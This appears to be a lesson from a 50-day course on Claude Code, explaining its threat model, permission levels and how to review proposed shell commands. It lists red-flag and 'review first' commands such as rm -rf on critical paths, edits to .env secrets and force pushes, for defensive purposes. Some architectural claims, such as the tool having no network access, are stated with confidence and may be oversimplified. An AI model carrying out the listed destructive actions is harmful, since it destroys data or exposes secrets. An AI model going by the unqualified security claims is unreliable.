Lesson 39: Security Model Deep Dive
Day 39 of 50 · ~7 min read · Phase 5: Advanced Patterns
The Opening Question
Claude Code can:
- Read any file in your project
- Edit any file in your project
- Run arbitrary shell commands
- Create commits and push to git
- Delete files (with permission)
This is powerful. But it's also terrifying if you think about it wrong.
Here's the real question: what's actually stopping Claude Code from reading your .env file, exfiltrating your database password, and pushing it to GitHub?
Think hard before reading on. The answer isn't "Anthropic's safety training" — it's something more architectural.
Discovery
Question 1: What's the threat model when an AI has shell access?
In Lesson 1, we framed Claude Code as "a junior developer sitting next to you." But now we need to ask: what if that junior developer was untrustworthy? What if their training was compromised? What if you couldn't see what they're doing?
The threat model has two parts:
- What Claude Code intends to do — is the model itself reliable?
- What Claude Code can actually do — what technical boundaries exist?
Most people focus on (1), but (2) is where Claude Code's security actually lives.
Think about this: if Claude Code wanted to exfiltrate data, how would it do that? It would need to send data somewhere — to a network endpoint, to GitHub, to email. Claude Code can't make network requests or send emails by default. It's sandboxed.
Follow-up: But it can edit files and run commands. Couldn't it modify a script to do something malicious?
Pause and think about the chain of actions that would need to happen.
Question 2: What is Claude Code's actual permission system?
You've learned about permissions in Lesson 17 (CLAUDE.md), but let's dig deeper.
Claude Code operates under three trust levels:
Level 1: Interactive Mode (Default)
- Claude Code can read any file
- Claude Code proposes edits and waits for you to approve
- You see every command before it runs
- You must explicitly click "confirm" or say "yes"
- This is the safest mode because you're the approval gate
Level 2: Headless Mode (Opt-in)
- Claude Code runs without your approval for each command
- Used in CI/CD pipelines or scheduled tasks
- Requires explicit setup in your CLAUDE.md:
{"headless": true} - The trade-off: you get speed, you lose immediate oversight
Level 3: Custom Permissions (Advanced)
- You can restrict Claude Code per-directory
- Example: "Claude can read
src/, but can't editsrc/secrets/" - You can forbid dangerous commands: "No
rmon critical files" - Permissions are declarative, not programmatic
Why does this matter? Because the permission system forces you to make security explicit. You can't accidentally give Claude Code dangerous access — you have to choose it.
Question 3: What's the difference between "harmless if untrusted" and "trustworthy"?
Here's a subtle distinction that changes everything:
Harmless if untrusted: Even if Claude Code's reasoning was compromised or adversarial, the architecture prevents harm. Example: Claude Code can't make network requests, so it can't exfiltrate data no matter how hard it tries.
Trustworthy: Claude Code's training and behavior can be relied upon to do the right thing, even if given the power to do the wrong thing.
Claude Code is designed with (1) — it's architecturally constrained. But you shouldn't confuse that with (2). The permission system and approval gates are additional safeguards that assume the model can be wrong or confused.
Think about this in your own work: you probably don't trust a junior developer with root access to production, even if they're well-intentioned. Why? Because mistakes happen. The same principle applies here.
Question 4: How do you review commands safely?
In interactive mode, Claude Code shows you each proposed command before it runs. But what if it proposes 20 commands in a row? Do you just hit "yes" on all of them?
No. Here's how to review safely:
- Read the command carefully. What does it actually do? Does it match the stated goal?
- Check the working directory. Is it running in the right place?
- Look for side effects. Does it delete anything, modify environment variables, or make network calls?
- Trust but verify. If something seems off, ask Claude Code to explain before approving.
Common red flags:
- Commands with
rm -rfon critical paths - Commands that modify
.envor secrets files - Commands that clone from untrusted sources
- Commands with shell globs that might match more than intended (
rm *.tmpcan go wrong)
Mental model: You're not reviewing Claude Code's character — you're reviewing its reasoning. A smart agent can make a dumb mistake. Your approval gate catches those.
The Insight
Claude Code's security doesn't rely on trusting the model — it's built on architectural constraints (no network access, sandboxing) and permission systems (interactive approval, directory-level controls, headless opt-in). Your job is to understand the threat model and use the permission system intentionally, reviewing commands before you execute them.
The mental model: Claude Code is powerful like a shell is powerful. A shell can do anything on your machine. That's not a bug, it's a feature — but you still use sudo carefully, you don't run scripts from untrusted sources, and you review commands before executing them. Same principle here.
Try It
Task: Set up intentional security for a real project.
-
Audit your permissions: Open your CLAUDE.md (or create one) and write out what you'd be comfortable letting Claude Code do:
# Security Model for [Project] ## What Claude Can Read - Everything in `src/` - `package.json`, `README.md` ## What Claude Can Edit - Everything in `src/` - Test files - Documentation ## What Claude Cannot Edit - `.env`, `.env.local` (secrets) - `src/secrets/` directory - Deployment configurations ## Dangerous Commands (Review First) - Any command with `rm` on core files - `npm publish` - Git commands that modify history (`reset --hard`, `force push`) -
Give Claude Code a task that would normally be risky (like refactoring a core module), and practice reviewing each command before approval.
-
Intentionally try something forbidden: Ask Claude Code to read
.envor edit a secrets file. Notice how it declines or proposes alternatives.
Key Concepts Introduced
| Concept | Definition |
|---|---|
| Threat model | The specific ways something could go wrong, and who/what could cause harm |
| Harmless if untrusted | A system that's secure even if the agent is compromised or adversarial |
| Interactive approval | Requiring human confirmation before each command is executed |
| Permission declaration | Explicitly stating what an agent can and cannot do, rather than hoping it will act safely |
| Sandboxing | Technical constraints that prevent certain actions (e.g., no network access) |
Bridge to Lesson 40
You now understand how Claude Code's security model works. It's not magic — it's intentional design that assumes AI agents can make mistakes, so you build safeguards before mistakes happen.
But there's a new dimension we haven't explored yet: remote control.
What if you could push messages to Claude Code from your phone? From a webhook? From Slack? What if Claude Code could be a responsive agent that reacts to events, not just a tool you invoke from your terminal?
Tomorrow's question: How do you extend Claude Code beyond your local machine?